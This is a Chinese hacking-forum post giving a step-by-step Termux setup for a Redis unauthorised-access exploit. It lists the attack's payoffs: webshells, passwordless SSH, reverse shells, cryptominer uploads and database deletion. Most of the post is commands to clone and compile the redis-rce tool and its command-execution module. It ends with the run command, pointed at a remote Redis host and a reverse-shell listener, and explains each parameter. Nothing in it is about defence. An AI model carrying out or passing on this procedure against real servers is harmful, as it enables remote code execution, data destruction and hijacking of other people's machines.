设为首页
收藏本站
切换到宽版
登录
立即注册
找回密码
搜索
搜索
本版
帖子
用户
快捷导航
论坛
BBS
VIP用户组
官网群
无名商城论坛
»
论坛
›
资源分享区
›
学习资源专区
›
[Termux原创]redis数据库漏洞利用工具
返回列表
发帖
查看:
557
|
回复:
0
[TSD/原创]
[Termux原创]redis数据库漏洞利用工具
[复制链接]
无名
无名
当前离线
积分
32464
1万
主题
1万
帖子
3万
积分
管理员
积分
32464
发消息
发表于 2022-5-8 19:55:30
|
显示全部楼层
|
阅读模式
漏洞项:未授权访问
危害:
写入木马getshell
免密钥ssh登录
反弹shell
可上传挖坑木马
任意操作数据库(可删除数据库)
详情参照:
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
介绍方面上面的博文都写了,本文只介绍termux安装redis的漏洞利用工具。
前提:
termux中装有python3 以及 pip3
安装make
1. pkg install make
克隆redis-rce
2. git clone
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
克隆RedisModules-ExecuteCommand
3. git clone
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
进入文件夹
4. cd RedisModules-ExecuteCommand/src
编译
5. make
复制文件
6. cp module.so ~/redis-rce
安装模块
7. pip3 install six
运行exp
8. python3 redis-rce.py -r 192.168.2.170 -p 6379 -L 127.0.0.1 -P 8989 -f module.so
注意:
-r参数是指远程Redis IP地址 -p是远程redis的端口 -L参数是指反弹到的服务器IP地址 -P是本地接受反弹的端口。
(注意大小写)
最好一张图正常运行。
redis
,
ExecuteCommand
,
RedisModules
,
反弹
,
漏洞
相关帖子
•
【HR】SRC挖掘技巧① 带你挖漏洞
•
对本板块某iApp后台进行安全渗透测试
•
【原创】chrome已提交的两个漏洞分析(一)
•
【原创教程】手机安装kali和sqlmap
•
【搬砖】常用端口说明
•
【FUT】web安全教程-漏洞挖掘-如何去查找漏洞
•
【DMT】<web安全系列>代码审计,SQL漏洞发现
回复
使用道具
举报
返回列表
发帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表